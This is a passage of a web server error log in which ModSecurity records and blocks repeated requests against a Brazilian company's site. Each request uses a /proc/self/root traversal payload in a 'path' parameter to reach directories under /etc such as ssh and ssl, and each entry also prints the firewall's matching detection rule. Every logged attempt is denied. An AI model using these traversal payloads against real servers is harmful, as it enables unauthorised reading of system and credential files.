"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP-qBJNF7axNlVR0UZgAAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:39.491083 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:51286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP-7-sgTmmJoPuMdy4PQAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:40.802231 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:51296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP_MU6Sx0TG1YjmQiw3gAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:42.092286 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:51312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP_hj0p0SRWAqcjGF7XgAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:43.427723 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.241.31:51322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP_64xEDsg_V3ESNZOWAAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:44.783280 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:51332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQANY0UrI5A3LftIz94wAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:46.063214 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:51344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQAsU6Sx0TG1YjmQiw5QAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:47.323756 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:47662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQA6BJNF7axNlVR0UZgQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:48.619468 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:47676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQBNY0UrI5A3LftIz95QAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:49.906294 2026] [:error] [pid 9299:tid 140411599251200] [client 74.7.241.31:47680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQBb-sgTmmJoPuMdy4PwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:51.237793 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:47688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQB7-sgTmmJoPuMdy4QAAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:52.581620 2026] [:error] [pid 7004:tid 140411649607424] [client 74.7.241.31:47704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQCMU6Sx0TG1YjmQiw7AAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:53.899260 2026] [:error] [pid 7004:tid 140411666392832] [client 74.7.241.31:47710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQCcU6Sx0TG1YjmQiw7wAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:56.092925 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:47718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQC9Y0UrI5A3LftIz95wAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:56.133767 2026] [proxy_fcgi:error] [pid 6296:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39014] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:31:57.428297 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:54560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQDdY0UrI5A3LftIz96AAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:58.726697 2026] [:error] [pid 9299:tid 140411674785536] [client 74.7.241.31:54576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQDr-sgTmmJoPuMdy4RgAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:59.994966 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:54580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQD8U6Sx0TG1YjmQiw9QAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:01.319482 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.241.31:54588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQEb-sgTmmJoPuMdy4SwAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:02.709272 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:54590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQEtY0UrI5A3LftIz96gAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:16.947698 2026] [:error] [pid 7004:tid 140411733534464] [client 74.7.243.128:58458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQIMU6Sx0TG1YjmQixAwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:17.814639 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:54592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQIRj0p0SRWAqcjGF7bwAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:32:18.133827 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39388] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:32:26.770840 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.241.31:40466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQKq4xEDsg_V3ESNZOZwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
